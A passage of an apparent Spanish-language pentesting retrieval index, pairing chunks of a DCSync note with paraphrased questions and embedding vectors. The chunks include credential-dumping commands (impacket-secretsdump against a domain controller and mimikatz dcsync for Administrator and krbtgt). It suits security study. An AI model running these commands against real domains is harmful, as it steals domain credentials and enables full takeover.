-0.07074, -0.01193, -0.01549, -0.02693, -0.07712, -0.01389, -0.01711, -0.00867, -0.04316, 0.01072, -0.06287, 0.17672, -0.10064, -0.06508, -0.01889, 0.01765, -0.11779, -0.00258, -0.00088, 0.12552, -0.00793, 0.02825, -0.04853, 0.02072, -0.08068, -0.04595, 0.04221, 0.00457, 0.02612, -0.11799, 0.01613, 0.03872, -0.00835, -0.11058, 0.06541, 0.05565, -0.09106, 0.09287, 0.07007, -0.03057, -0.01805, 0.00502, 0.00238, -0.02928, 0.00806, -0.00269, 0.05037, -0.02318, -0.02771, 0.05429, -0.01043, -0.06723, -0.06522, 0.03209, -0.01292, 0.01855, 0.02995, -0.04872, 0.0188, -0.0369, -0.06342, 0.02063, 0.06845, -0.05644, 0.00543, 0.01809, -0.00606, -0.06442, 0.00291, -0.02139, -0.02743, 0.06108, -0.10778, -0.04914, -0.04793, -0.04903, -0.01812, -0.02832, -0.05828, 0.00786, -0.01714, -0.03013, 0.02248, 0.00791, 0.01978, 0.04976, 0.02256, 0.14598, -0.00854, -0.05736, 0.00505, 0.02624, -0.08424, 0.0146, -0.10029, -0.02366, -0.01606, 0.016, 0.06811, -0.00333, 0.04593, 0.01055, 0.02455, -0.00867, -0.00803, -0.01887, -0.01911, 0.00535, 0.02182, 0.00311, -0.01863, -0.01576, -0.02152, -0.03443, -0.0873, 0.0175, 0.03196, 0.00144, -0.06244, -0.00775, -0.0024, -0.06692, 0.04629, -0.05351, -0.05964, 0.01905, -0.02359, 0.05303, 0.00619, 0.11567, -0.00352]} -{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# DCSync\n\n> Con permisos de **replicaciΓ³n de directorio** (DS-Replication-Get-Changes), pides al DC que te \"replique\" los hashes **como si fueras otro DC**. No necesitas pisar el DC.", "indexar": "que programa puedo usar para obtener rΓ©plicas del directorio sin estar fΓ­sicamente en el dominio?", "v": [0.07626, 0.11359, -0.1558, -0.06678, 0.0266, -0.02412, 0.03681, -0.08519, -0.14006, -0.01456, -0.02176, -0.11728, -0.07058, -0.27509, -0.01491, -0.09476, 0.16787, 0.00322, -0.07686, -0.08637, 0.02557, -0.10422, -0.05315, -0.0148, 0.07646, 0.05763, 0.00966, -0.09216, -0.04283, 0.04278, 0.1162, 0.02291, 0.06805, -0.15128, -0.06198, -0.01993, 0.04096, 0.06414, 0.14353, 0.0982, 0.0488, -0.00631, -0.14731, 0.08209, -0.06514, 0.05059, 0.02739, -0.11, -0.05107, -0.08625, 0.03475, -0.01095, -0.11099, -0.04151, 0.06359, -0.13385, 0.08692, -0.16679, 0.01068, -0.0048, -0.01493, -0.06049, -0.00221, 0.08888, 0.00185, -0.08025, 0.05595, -0.01078, -0.12351, -0.03977, -0.05236, 0.02359, 0.0673, 0.01559, 0.01931, -0.01661, 0.00905, -0.13839, 0.02954, -0.03, -0.0318, -0.02683, 0.03135, 0.01405, -0.1461, -0.13739, 0.01189, -0.09681, 0.06198, -0.09544, -0.00441, 0.0464, -0.08776, -0.03312, 0.04341, -0.07869, 0.064, 0.00438, -0.02939, 0.04701, 0.10342, 0.05723, -0.12947, 0.06041, 0.05807, 0.0664, 0.05021, -0.07135, -0.11036, 0.08095, 0.00067, -0.09382, -0.10605, -0.04134, -0.08664, 0.05658, -0.05485, -0.03428, 0.07941, -0.03504, -0.07626, -0.01284, -0.01959, 0.01342, 0.06065, 0.00847, 0.00675, 0.01003, -0.05701, -0.02875, -0.02415, 0.00445, -0.01291, -0.0927, -0.07892, -0.01129, 0.04337, 0.03376, 0.04418, -0.07174, 0.02354, 0.03963, -0.06704, -0.00169, -0.05411, -0.06764, 0.01875, -0.09478, -0.01619, -0.01864, -0.01319, 0.01386, -0.00642, 0.06126, -0.02318, 0.01353, 0.02152, -0.03346, -0.00664, 0.02572, -0.1153, 0.00218, -0.08569, 0.02634, 0.06265, -0.07368, 0.01486, 0.00062, 0.04363, 0.09543, -0.01598, 0.08152, 0.0373, -0.05492, -0.02108, -0.00877, 0.04953, -0.05233, 0.00831, -0.0028, -0.04157, 0.00265, 0.00259, 0.02944, -0.05815, 0.07258, 0.0039, 0.06898, -0.01532, 0.02422, 0.04702, 0.06481, 0.03234, 0.03978, 0.01908, -0.01742, 0.00677, 0.05778, 0.01909, -0.00538, -0.0487, 0.00479, 0.01604, -0.01605, 0.08964, 0.02851, -0.02495, -0.01963, 0.0302, 0.01196, 0.0055, -0.03536, 0.07628, 0.00303, -0.04886, -0.02601, -0.00959, 0.0776, -0.01771, -0.02077, -0.05023, 0.01615, 0.02715, 0.04707, 0.00451, -0.05307, 0.00237, 0.0032, 0.05134, 0.07044, -0.04879, 0.01804, 0.0121, -0.00093, 0.04486, 0.00032, 0.0001, 0.00135, 0.02213, -0.0069, -0.0884, 0.12825, 0.013, -0.03919, -0.04219, -0.02363, -0.06416, 0.03694, -0.01617, 0.00779, 0.01078, 0.01937, 0.03005, -0.04445, -0.03291, 0.03833]} -{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# DCSync\n\n> Con permisos de **replicaciΓ³n de directorio** (DS-Replication-Get-Changes), pides al DC que te \"replique\" los hashes **como si fueras otro DC**. No necesitas pisar el DC.", "indexar": "con quΓ© herramienta puedo pedir cambios de replicaciΓ³n al controlador de dominios desde fuera?", "v": [0.11415, 0.08573, -0.09711, -0.11754, 0.04569, -0.0422, 0.02968, 0.05514, -0.10038, -0.07878, 0.00481, -0.1025, 0.02893, -0.17999, 0.03199, -0.06739, 0.15728, -0.06045, -0.02577, 0.01187, 0.02921, -0.09284, 0.00299, -0.10371, 0.00069, -0.02827, 0.02807, -0.0416, -0.14703, 0.0675, -0.00857, -0.02436, 0.03053, -0.00093, -0.08537, -0.06502, 0.00508, 0.06561, 0.09654, 0.0484, -0.00586, -0.0554, -0.1144, -0.02137, -0.04978, -0.02945, -0.05213, -0.02338, -0.0102, -0.03465, -0.11387, -0.1448, -0.11217, -0.01368, 0.04657, -0.12032, 0.29214, -0.15787, 0.0856, -0.1289, -0.04564, -0.06847, 0.06051, 0.03598, -0.03901, -0.05135, -0.06004, -0.10472, -0.05977, 0.07143, -0.10898, -0.02664, 0.02641, 0.0057, 0.01041, -0.05476, 0.06162, -0.02703, 0.00633, -0.02053, 0.01685, -0.00182, -0.11811, 0.00589, 0.06207, -0.08774, -0.16097, -0.12832, 0.00694, -0.01544, -0.04059, 0.00393, -0.01144, -0.0173, -0.01304, -0.03713, -0.0042, -0.00973, -0.104, 0.00022, 0.1362, 0.09818, -0.15904, 0.14235, 0.04165, 0.11496, 0.03296, -0.11291, -0.06399, 0.00328, 0.03628, -0.03476, 0.00491, -0.00547, -0.05179, 0.09319, -0.05057, -0.06171, 0.00088, -0.00383, -0.01244, -0.04858, 0.05043, -0.04725, 0.02163, 0.035, -0.01933, 0.03347, 0.04016, -0.11293, -0.01676, -0.04248, 0.02049, -0.06806, -0.04431, 0.01671, -0.05275, -0.02127, 0.00999, -0.00996, -0.10014, 0.06829, 0.05393, -0.05654, 0.07228, -0.09617, 0.02036, -0.06494, -0.06962, -0.02637, 0.00725, 0.01899, -0.0052, 0.11016, -0.01231, 0.03697, -0.05628, 0.00872, -0.04623, 0.03828, -0.0955, -0.00933, -0.03698, 0.00811, 0.02615, -0.03785, 0.02524, -0.01663, 0.0421, 0.07765, -0.05881, 0.02999, 0.00378, -0.02423, -0.03184, -0.04931, -0.06327, 0.01093, -0.02052, -0.04264, -0.04707, 0.07094, -0.05241, -0.01193, 0.01647, -0.00035, 0.03668, 0.02337, 0.01762, 0.01578, 0.06903, 0.07235, 0.02973, -0.06746, 0.05086, 0.00902, 0.03596, -0.00179, -0.00644, -0.00906, -0.05025, -0.0306, -0.03454, -0.10149, 0.01684, 0.04434, -0.00873, 0.06832, 0.03242, -0.03615, -0.00844, -0.0273, 0.05594, 0.0299, -0.0241, -0.03125, 0.03262, -5e-05, -0.01971, -0.02657, 0.03909, 0.03578, 0.05442, -0.01098, -0.02942, -0.00843, 0.00769, 0.02035, 0.00436, 0.04284, 0.03357, 0.02528, -0.00701, -0.08786, 0.05119, -0.00409, 0.05103, -0.03934, -0.02344, -0.01847, -0.06062, 0.08165, -0.01272, -0.05103, -0.04718, -0.10796, -0.06504, -0.03352, -0.02093, -0.03674, -0.01556, 0.04668, 0.04529, -0.09515, -0.0378, -0.03569]} -{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# DCSync\n\n> Con permisos de **replicaciΓ³n de directorio** (DS-Replication-Get-Changes), pides al DC que te \"replique\" los hashes **como si fueras otro DC**. No necesitas pisar el DC.", "indexar": "cual es una alternativa a DCSync para hacer clics de replicaciΓ³n sin conexiΓ³n directa?", "v": [-0.12063, 0.05673, -0.21247, -0.07359, 0.04977, -0.18033, -0.15632, 0.06809, -0.04022, 0.15777, 0.07213, -0.23699, -0.09548, -0.15027, 0.0658, -0.11374, 0.01176, 0.0432, -0.00523, -0.17923, 0.01128, -0.10856, -0.03478, -0.1037, 0.11252, 0.00115, -0.02161, 0.09727, -0.0575, -0.00972, 0.10411, -0.03403, 0.11557, 0.08748, -0.0173, 0.01313, 0.03406, 0.09182, 0.20623, -0.09844, -0.12927, -0.03734, -0.22379, 0.07245, -0.1017, -0.04613, 0.08577, -0.03344, -0.05439, -0.06475, -0.17659, 0.02736, -0.18548, 0.01798, -0.04456, -0.09535, 0.05585, -0.02684, 0.0903, -0.09742, -0.00376, 0.06501, -0.01389, 0.00839, 0.00626, 0.08221, -0.05918, -0.08739, -0.08806, 0.0635, -0.0108, 0.0452, 0.01321, -0.08783, 0.054, 0.00316, 0.08751, -0.10633, 0.0316, 0.02273, 0.06799, -0.04229, 0.05821, 0.02265, -0.00703, 0.07015, 0.05917, 0.03274, -0.04181, 0.01728, 0.07103, 0.02532, -0.0438, 0.04353, 0.0368, -0.15366, 0.00729, -0.0468, 0.01041, 0.05997, 0.05011, -0.01561, -0.06709, 0.08412, -0.04613, -0.02407, 0.06093, 0.01714, -0.04674, 0.02073, 0.03573, 0.04543, -0.03085, -0.02481, 0.02112, -0.04577, -0.01283, -0.03674, -0.00906, -0.00779, -0.07296, -0.02212, -0.07577, -0.10291, -0.0023, 0.08704, 0.0294, -0.03035, -0.06712, 0.0232, 0.02366, -0.04407, 0.02009, -0.12329, 0.02635, -0.04248, 0.01806, -0.018, 0.03954, -0.05333, 0.05451, 0.01805, 0.02477, 0.00624, 0.02521, -0.04079, 0.05849, -0.04924, -0.05316, -0.00398, -0.00208, 0.04132, -0.03824, 0.02069, -0.05294, 0.01345, -0.08646, 0.03426, -0.0068, 0.06901, -0.04044, -0.00278, 0.04752, -0.02781, -0.0291, -0.04647, -0.03757, -0.02197, -0.00974, 0.04964, -0.07214, 0.08111, 0.0076, -0.03325, -0.03438, 0.00429, 0.01988, -0.02476, 0.06267, 0.00366, 0.02356, -0.01193, -0.03289, -0.0143, 0.01035, -0.0395, 0.01979, 0.05594, -0.01298, 0.05044, -0.01009, -0.06654, 0.02816, 0.00384, 0.0446, -0.03029, 0.03833, -0.02485, -0.00376, 0.0196, -0.00064, -0.03577, -0.00055, -0.01633, 0.06222, 0.03896, -0.01084, 0.04618, -0.01811, 0.01712, 0.0384, 0.02334, 0.07854, 0.02117, 0.00139, -0.01741, 0.02582, -0.0285, 0.01661, 0.02786, 0.01581, -0.01154, -0.01743, 0.01515, 0.01676, -0.01371, 0.01901, 0.02061, -0.04462, 0.00345, -0.0138, 0.03106, -0.0075, 0.0197, -0.00406, 0.01267, -0.02506, 0.00236, 0.01285, 0.00902, 0.04617, 0.01956, -0.03246, 0.03666, 0.00555, 0.01858, -0.01979, 0.01773, -0.01007, -0.03956, 0.01563, -0.02571, 0.01963, 0.03648, 0.01927, -0.01159]} -{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## CΓ³mo se llega\n- Un usuario con esos derechos (te lo dice BloodHound: arista `DCSync` / `GetChangesAll`).\n- O un ACL abuses que te conceda esos derechos.", "indexar": "con quΓ© herramienta puedo obtener los permisos necesarios para ver el Γ‘rbol de confianza completo?", "v": [0.03609, 0.16424, -0.1622, -0.08592, 0.07838, -0.00041, 0.01754, -0.02946, -0.1209, -0.17915, -0.07048, 0.08458, 0.01817, -0.00559, 0.04618, -0.00248, 0.11753, -0.02215, -0.05271, 0.10354, 0.11142, -0.10212, -0.09617, -0.03067, -0.03698, -0.04288, 0.06081, 0.03154, -0.17805, 0.06894, 0.06214, 0.12203, 0.10372, -0.03216, -0.02278, 0.03667, -0.02734, 0.12756, -0.08249, -0.06824, -0.02623, 0.0174, -0.01814, 0.08126, -0.03259, -0.04967, -0.08601, 0.03746, -0.04323, 0.01624, -0.10152, -0.09707, -0.12375, -0.17724, -0.04164, -0.06539, 0.15954, -0.07555, 0.09014, -0.04802, -0.19734, 0.00617, 0.00441, -0.0176, -0.00306, -0.00324, 0.07437, 0.04088, -0.02403, -0.00255, -0.09926, -0.04229, 0.00035, -0.04253, 0.03363, -0.03135, -0.04256, -0.02285, -0.04984, 0.06273, 0.09854, 0.01728, -0.08896, -0.05838, 0.00466, -0.01994, 0.06013, -0.04405, 0.03967, -0.0977, -0.01908, 0.05985, -0.02452, 0.02822, 0.0058, -0.02224, -0.08548, 0.06258, -0.025, 0.03522, 0.04318, -0.01491, 0.00631, 0.10583, -0.02244, 0.01989, 0.01158, -0.026, -0.09913, 0.02393, 0.02456, 0.04625, -0.01417, 0.03584, -0.04644, 0.02891, -0.05668, -0.10249, -0.04211, -0.00109, 0.01045, 0.05346, -0.03141, 0.06761, -0.02294, -0.04443, -0.07225, 0.18243, 0.02332, -0.09684, -0.02511, -0.06286, -0.10628, -0.01005, -0.05192, 0.00998, -0.00256, -0.11182, -0.12832, -0.05668, -0.00837, 0.02555, 0.01849, -0.04786, 0.0534, 0.00787, -0.05675, -0.01794, 0.01958, -0.09985, 0.04267, 0.0429, 0.00248, 0.1039, 0.0287, 0.02045, -0.03428, 0.00179, 0.01228, 0.06566, -0.02809, -0.06023, 0.04473, 0.08473, 0.05614, -0.01382, 0.01972, -7e-05, 0.08602, 0.03575, -0.04947, -0.01126, 0.01863, -0.01402, 0.02955, -0.07008, -0.03542, -0.02359, 0.00825, -0.05238, -0.09042, 0.01505, -0.09833, -0.03031, 0.01207, -0.03431, -0.02088, -0.04869, 0.05678, 0.03791, -0.04, 0.10327, -0.05696, -0.03059, 0.00377, -0.01119, -0.02426, -0.02502, 0.03675, -0.06508, -0.01049, -0.00774, -0.05513, -0.03501, 0.12668, -0.00766, -0.00328, 0.03214, -0.01702, 0.09974, 0.06852, -0.07192, 0.05668, -0.01667, -0.00684, -0.03115, -0.00165, 0.00471, -0.06226, 9e-05, 0.0584, 0.06845, 0.09423, 0.02226, -0.00025, 0.00211, 0.03953, 0.04554, 0.03105, 0.09403, -0.04821, 0.02698, -0.02323, -0.01919, 0.07714, -0.03724, 0.06838, -0.04446, -0.08793, -0.02268, 0.03181, 0.02371, -0.00952, -0.02678, -0.0455, -0.04814, -0.06037, 0.01979, 0.00099, -0.10385, -0.00779, 0.03945, 0.04525, -0.06969, 0.01921, -0.09792]} -{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## CΓ³mo se llega\n- Un usuario con esos derechos (te lo dice BloodHound: arista `DCSync` / `GetChangesAll`).\n- O un ACL abuses que te conceda esos derechos.", "indexar": "quΓ© programa me permite identificar si hay privilegios abusivos sobre mis derechos administrativos?", "v": [0.14266, 0.13829, 0.01051, -0.14422, 0.14992, 0.02159, 0.03198, -0.11771, -0.28783, 0.00928, 0.04001, -0.0132, -0.06806, 0.03401, 0.10129, -0.08852, 0.12133, -0.05176, 0.07646, 0.08968, 0.05866, -0.10069, 0.02048, 0.02728, -0.08143, -0.12292, -0.01899, -0.04468, -0.01108, 0.03056, 0.031, 0.07294, 0.01614, -0.08696, 0.01582, 0.02754, 0.00867, 0.09259, 0.02822, 0.11815, 0.16691, -0.05087, -0.06519, 0.02823, 0.03927, -0.12954, -0.09196, 0.01052, -0.07065, -0.02387, 0.05063, -0.05631, -0.05266, -0.07857, 0.1076, -0.04092, -0.05981, -0.01702, -0.03759, 0.00932, -0.06621, -0.01446, 0.0792, 0.08496, -0.01065, 0.01359, 0.13576, -0.02503, 0.0036, 0.09002, 0.04625, -0.04868, 0.03943, -0.02007, -0.0002, -0.00328, -0.11617, -0.06166, 0.10106, -0.06491, -0.05732, 0.03153, 0.00808, 0.04992, -0.0609, -0.0477, 0.04434, -0.01398, -0.04603, -0.05834, 0.03603, 0.03975, 0.03081, -0.07157, -0.01743, 0.01698, -0.02071, 0.10251, 0.05542, 0.09348, 0.07498, -0.02617, -0.09416, 0.05717, -0.00262, 0.0822, -0.05433, -0.0988, 0.00679, -0.01651, -0.05737, 0.03623, -0.07872, 0.04867, 0.03335, 0.1309, -0.03327, -0.00505, 0.0262, -0.09454, -0.03869, -0.0423, 0.0326, -0.04484, 0.15614, -0.13128, 0.06992, 0.15571, -0.08546, 0.08944, -0.05896, -0.08709, 0.068, 0.00775, -0.05405, -0.08317, 0.00793, 0.00794, 0.0243, -0.04632, 0.01865, 0.01986, -0.05124, 0.01329, -0.00106, -0.01602, -0.06045, -0.0193, -0.05567, -0.05766, -0.03381, -0.02106, 0.02158, 0.02045, -0.0489, -0.02875, 0.00227, -0.0905, -0.16285, -0.01279, -0.00972, -0.10131, -0.02458, -0.0302, 0.12524, -0.02141, 0.05603, -0.04581, 0.03347, 0.03321, 0.02614, 0.01944, 0.05858, 0.00058, -0.00471, -0.04572, -0.03457, 0.01943, 0.06101, -0.01969, -0.12208, 0.0248, 0.06225, 0.01666, -0.05179, -0.06035, -0.08626, 0.04962, 0.02825, 0.03245, 0.05954, 0.06326, 0.05329, -0.01333, 0.00324, 0.02941, -0.04788, 0.01149, -0.00794, -0.04328, 0.00114, -0.05048, 0.02491, 0.01763, 0.01372, 0.01319, 0.01636, -0.03046, 0.01477, 0.08972, -0.03126, 0.0193, 0.05703, 0.01042, -0.05969, 0.0189, -0.01419, -0.00641, 0.01453, -0.02382, 0.01033, -0.02409, 0.04677, 0.0335, 0.04726, -0.0018, 0.05864, 0.02623, 0.00671, -0.0028, 0.02206, -0.04723, -0.01012, -0.06415, 0.01211, -0.05214, -0.03772, -0.0529, -0.01913, -0.06657, -0.0235, 0.10193, 0.05216, -0.05062, 0.00598, 0.01087, -0.02423, -0.0589, -0.05744, 0.00994, 0.0187, -0.00018, 0.05969, -0.08488, 0.02246, 0.02555]} -{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Ataque\n```bash\nimpacket-secretsdump dominio/usuario:password@DC_IP # β†’ ver secretsdump\n```\n```", "indexar": "que herramienta puedo usar para descargar contraseΓ±as de una mΓ‘quina Windows?", "v": [0.04897, 0.06603, -0.1066, -0.23943, -0.04287, -0.05962, -0.15214, -0.06313, -0.01692, -0.08406, -0.08518, -0.04694, -0.06737, -0.06269, -0.04769, 0.02588, 0.06603, -0.05196, 0.00627, 0.05858, 0.03079, -0.06247, -0.1251, -0.01542, -0.0735, 0.06545, 0.04268, -0.03738, -0.25001, -0.01272, 0.00253, 0.00977, 0.06103, -0.04015, -0.08515, 0.00717, -0.04316, 0.09509, 0.09891, 0.0718, 0.09603, 0.10028, -0.1343, 0.12, 0.06984, -0.01826, 0.07344, -0.02996, 0.06604, 0.04132, -0.06265, -0.16, -0.05455, -0.02454, 0.00281, -0.21471, 0.23624, -0.05272, 0.01246, -0.03761, -0.09689, 0.11311, -0.04883, 0.08377, -0.09102, -0.05497, 0.04176, -0.01965, -0.09613, 0.09337, -0.02789, 0.02198, 0.02481, 0.01156, 0.04604, 0.04195, -0.00214, -0.03423, 0.08018, 0.03449, 0.00842, -0.0011, 0.01112, -0.0652, -0.09477, -0.11016, 0.0839, -0.02719, 0.11072, -0.14291, 0.03576, 0.00515, -0.03795, 0.02295, 0.06359, -0.06909, 0.01215, -0.01861, -0.00248, 0.03573, 0.05489, -0.05613, 0.02649, 0.11637, -0.05392, 0.02066, -0.00687, -0.04541, -0.0415, -0.07946, 0.03669, 0.02974, -0.03787, -0.02624, -0.03622, 0.02917, 0.00131, -0.09216, -0.02114, -0.01758, -0.01769, 0.01804, -0.0429, -0.04119, 0.04652, -0.0245, -0.00662, 0.10107, -0.14257, -0.08733, 0.04861, -0.0422, -0.10719, 0.03244, -0.05536, 0.03717, 0.0289, -0.14304, -0.04951, -0.08631, 0.03602, 0.05581, -0.0396, -0.05603, 0.04155, 0.05606, 0.0477, -0.02672, -0.02609, -0.04996, 0.10054, -0.05553, 0.01886, 0.01249, -0.05168, 0.04033, 0.0004, 0.02259, -0.04976, 0.04928, -0.05246, -0.05443, -0.0151, 0.00874, -0.06007, -0.01784, 0.0225, 0.06415, 0.03804, 0.03929, 0.0289, 0.0517, 0.03077, -0.02805, 0.00505, -0.03848, -0.00095, -0.02644, -0.01904, -0.06708, -0.06184, 0.01413, -0.01988, -0.07017, -0.01046, -0.00837, 0.0267, 0.02609, -0.03868, -0.00467, -0.01846, 0.03278, 0.01492, -0.02177, 0.04143, 0.00564, -0.03914, -0.02246, 0.03454, -0.05048, -0.07547, -0.01074, -0.09281, -0.05914, 0.09575, 0.04456, -0.05782, -0.03512, -0.00707, 0.01446, 0.03739, -0.00148, -0.0029, -0.0672, -0.04614, -0.06979, 0.00427, 0.02595, -0.02652, -0.04759, 0.02493, 0.00826, 0.06311, 0.04383, -0.00473, -0.01494, -0.01896, 0.0364, 0.03651, 0.00245, 0.01156, 0.061, -0.00487, -0.0299, 0.05364, -0.01432, -0.0088, -0.0438, -0.05976, -0.03119, -0.05174, 0.07284, 0.03622, -0.07226, -0.09112, -0.02308, -0.00442, -0.03203, -0.00711, -0.06612, -0.02988, 0.02181, 0.04213, -0.01091, -0.02881, 0.04317]} -{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Ataque\n```bash\nimpacket-secretsdump dominio/usuario:password@DC_IP # β†’ ver secretsdump\n```\n```", "indexar": "con que programa puedo extraer credenciales de un dominio especΓ­fico?", "v": [-0.05705, 0.06817, -0.10673, -0.0601, 0.05109, -0.01719, 0.16174, -0.0459, -0.22777, -0.10851, 0.00527, 0.04681, -0.09817, -0.30205, 0.0205, -0.00564, 0.18306, -0.03176, 0.02563, -0.0067, 0.00212, -0.16649, -0.04757, -0.05998, 0.04475, -0.03704, -0.07851, 0.00031, 0.03044, 0.12223, 0.01827, 0.07489, 0.02149, -0.07946, 0.03238, 0.00674, -0.01841, 0.07927, 0.0086, 0.06099, 0.06724, -0.02815, -0.07996, 0.04122, 0.02461, 0.02911, 0.02042, 0.00431, -0.04236, -0.13894, 0.03513, -0.05828, -0.06354, -0.08275, 0.06536, -0.05431, 0.02534, -0.10708, -0.03297, -0.01895, 0.02541, -0.01273, 0.04161, -0.00345, -0.00241, -0.02888, 0.05458, -0.00028, -0.06597, -0.00195, -0.06503, -0.04093, 0.17896, 0.00136, 0.0411, -0.0491, 0.0469, -0.04026, 0.06218, -0.10176, 0.03105, -0.01648, 0.04037, -0.00149, -0.06916, -0.05237, -0.06762, -0.13885, -0.00895, 0.01397, 0.0949, 0.09884, -0.06803, -0.00222, -0.03735, -0.02744, 0.09606, 0.0283, -0.04249, 0.02141, 0.08982, 0.02162, -0.09247, 0.19172, 0.0499, 0.10191, 0.07964, -0.0243, -0.04325, 0.0385, -0.02009, -0.05831, -0.06787, -0.0741, -0.09511, 0.05098, -0.09312, 0.03506, 0.06349, -0.06561, -0.09349, -0.11634, 0.06263, 0.01435, 0.06075, -0.04448, -0.10426, 0.06182, -0.08169, -0.08821, -0.04901, 0.07716, 0.00969, -0.00761, -0.0254, -0.00287, 0.03496, 0.00671, -0.04906, 0.01398, 0.01356, -0.06809, -0.02726, 0.01974, 0.0058, -0.06647, 0.01561, -0.12701, 0.01677, -0.04549, -0.01073, 0.05382, 0.03927, 0.05642, -0.07147, 0.0419, 0.02427, 0.02854, -0.02614, 0.05747, -0.10495, -0.02636, -0.03953, -0.05306, 0.08185, 0.01273, -0.02285, 0.00412, 0.02219, 0.12797, -0.05275, 0.08444, 0.02827, -0.02724, -0.00954, 0.04317, 0.02146, -0.09871, 0.01745, -0.03774, -0.10874, -0.00528, 0.0765, 0.01254, -0.06145, 0.01092, -0.03823, 0.02083, -0.0466, 0.03122, 0.0173, 0.02796, -0.01942, 0.01278, -0.01907, -0.00534, 0.01158, 0.01822, -0.00867, -0.00435, -0.08549, 0.01125, 0.05768, -0.02357, -0.00245, 0.09367, -0.00352, -0.00923, 0.04903, 0.0772, -0.01621, -0.03424, 0.03434, -0.03143, -0.0754, 0.0262, -0.00671, 0.03251, 0.00594, -0.03883, -0.02337, 0.01817, 0.06983, 0.03972, 0.01028, -0.07218, 0.03491, 0.01562, 0.0063, 0.07021, -0.01687, -0.01945, -0.03022, -0.04646, 0.02603, 0.01263, 0.01786, -0.00518, -0.0329, -0.02267, -0.06795, 0.03482, 0.03326, -0.05756, -0.08805, 0.00548, -0.07693, 0.06196, 0.00649, 0.00079, 0.01871, 0.03913, 0.02161, -0.05131, 0.04725, 0.05831]} -{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Ataque\n```bash\nimpacket-secretsdump dominio/usuario:password@DC_IP # β†’ ver secretsdump\n```\n```", "indexar": "cual es una alternativa libre a secretsdump para recuperar passwords?", "v": [0.09557, -0.00271, -0.0912, -0.10624, -0.14784, -0.14033, -0.07044, -0.09856, -0.13217, 0.00015, -0.02878, -0.03888, 0.01636, -0.00925, 0.05114, -0.04093, 0.03341, 0.00907, 0.15881, 0.06857, 0.02756, -0.0343, -0.0983, -0.0866, -0.00547, -0.0945, 0.06809, 0.12407, -0.06689, -0.01243, -0.01433, -0.03051, -0.00292, 0.0028, -0.1396, 0.13249, 0.17245, 0.1336, 0.05007, 0.04328, 0.07894, -0.02919, -0.06481, 0.11527, 0.02534, -0.06189, -0.10235, 0.06699, 0.11377, -0.0077, -0.16213, -0.06693, -0.07181, -0.1108, 0.04915, -0.09111, 0.09655, -0.04385, -0.06442, 0.03436, -0.11474, 0.07478, 0.10956, 0.09328, 0.05476, -0.13337, -0.01166, -0.04876, -0.08483, 0.17953, 0.04743, -0.01875, 0.01406, 0.05165, -0.08598, -0.0195, 0.0249, -0.03789, 0.02994, 0.13792, -0.05277, -0.07722, 0.0049, 0.03754, -0.09518, -0.10591, -0.01139, -0.02604, -0.01985, 0.01449, 0.07588, 0.00117, 0.00246, 0.14092, -0.03497, -0.07976, -0.00779, 0.09445, -0.11903, -0.00444, -0.02053, 0.05918, -0.10007, 0.06293, -0.04282, 0.01717, -0.0239, 0.08543, -0.03923, -0.01968, -0.01892, 0.03091, 0.05325, 0.0359, 0.00996, -0.03277, -0.0158, -0.0002, 0.02404, 0.04723, -0.07165, -0.04046, -0.01598, -0.01006, -0.01785, 0.04991, 0.064, 0.03684, -0.04235, -0.07327, 0.01721, 0.00255, -0.05687, -0.01052, -0.07931, 0.01304, 0.05781, -0.02757, -0.02706, -0.01979, 0.02634, -0.00524, 0.0052, 0.01336, 0.0801, 0.01742, 0.0792, -0.01557, -0.02957, -0.05291, -0.05798, 0.00313, -0.0006, 0.05494, -0.02738, 0.04701, -0.07377, -0.10611, -0.08362, 0.0984, -0.04935, -0.01248, -0.05389, -0.0153, 0.00798, -0.07205, 0.00116, 0.03379, -0.04353, -0.04442, 0.01514, 0.03689, 0.08856, -0.12329, 0.061, -0.0409, 0.02335, -0.10249, 0.05841, -0.08207, 0.04666, 0.02389, -0.03321, -0.00949, -0.01276, -0.07032, 0.01817, -0.02812, -0.02379, -0.0573, -0.02097, -0.09204, -0.05546, 0.01213, -0.04692, -0.02052, -0.01254, -0.04887, 0.05288, -0.02242, -0.01794, 0.00056, -0.01393, -0.02668, 0.03938, -0.03448, -0.0295, -0.05348, -0.04639, -0.03684, 0.06527, 0.01701, 0.07108, 0.01546, -0.10742, -0.05203, -0.03601, 0.01313, -0.09078, -0.02912, 0.0754, 0.04212, 0.04759, 0.0418, -0.00342, -0.04602, 0.01557, 0.07068, 0.0037, -0.02114, 0.01176, 0.07298, -0.03641, 0.05449, 0.07857, -0.05401, -0.07001, -0.02614, 0.013, -0.00093, 0.01101, 0.09786, 0.02304, -0.08637, -0.01035, -0.00202, -0.02599, -0.00526, -0.0104, 0.02809, -0.04365, 0.0732, 0.00199, -0.00955, 0.00683, -0.04574]} -{"tipo": "pregunta", "herramienta": "DCSync", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# o desde mimikatz en una mΓ‘quina del dominio:\nlsadump::dcsync /user:Administrator\nlsadump::dcsync /user:krbtgt # ← el premio gordo\n```", "indexar": "quΓ© herramienta sirve para descargar claves de servicio Active Directory en Windows?", 